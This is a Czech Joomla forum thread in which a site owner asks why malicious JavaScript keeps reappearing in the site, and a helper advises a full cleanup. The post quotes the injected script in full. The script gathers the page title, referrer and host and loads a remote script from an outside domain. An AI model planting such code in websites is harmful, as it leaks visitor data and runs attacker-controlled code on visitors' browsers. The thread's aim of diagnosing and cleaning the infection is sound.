Joomla - JS:Injection-A [Trj]

freebee
17. led 2016 19:54 #125280
Zdravím Vás,

potřeboval bych rad. Zhruba před týdnem se mi do joomly začal dostávat nežádoucí javascritový řetězec odkazující kamsi na knihovnu jquery. po jeho smazání to vydrží "čisté" cca dva dny. Nevíte někdo kde může být chyba? Práva jsou všude nastavené dle požadavků a externí modul je jen jeden a prověřený.
ukázka kódu:
scriptvar a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://pcodelab.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Bong
17. led 2016 22:14 #125287
Smazat nestačí. Postupujte podle návodu: www.bongovo.cz/joomla/40-jak-zachranit-hacknutou-joomlu

I'm sorry, my responses are limited...you must ask the right questions.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od freebee
17. led 2016 22:44 #125290
Návod řeší ale jen obnovu ze zálohy. Mě jde spíš o to, jak se tohle mohlo stát, abych neobnovil a nestalo se to znovu. FTP přístup přes joomlu je vypnutý, heslo menim každý měsíc.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Bong
17. led 2016 23:00 - 17. led 2016 23:05 #125292
Trochu iniciativy přidejte...

Pokud čistou zálohu nemáte, pak nezbude než si zazálohovat stávající, stáhnout na PC a vyčistit (nejen smazat vložené, ale i hledat změněné soubory, soubory navíc, upravené další soubory,...). pak pracovat s tou vyčištěnou verzí. Pokud to děláte nějak jinak, nebo nedodržíte některý z kroků, případně změníte pořadí, nemůžete mít jistotu, že tam není nějaká "díra".

Měnit heslo a to jen jedno, vám nepomůže i když jej budete měnit každý den. Už z toho, že se situace opakuje vidíte, jak je to neúčinné a netušíte jakou cestou se tam útočník dostává.

I'm sorry, my responses are limited...you must ask the right questions.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.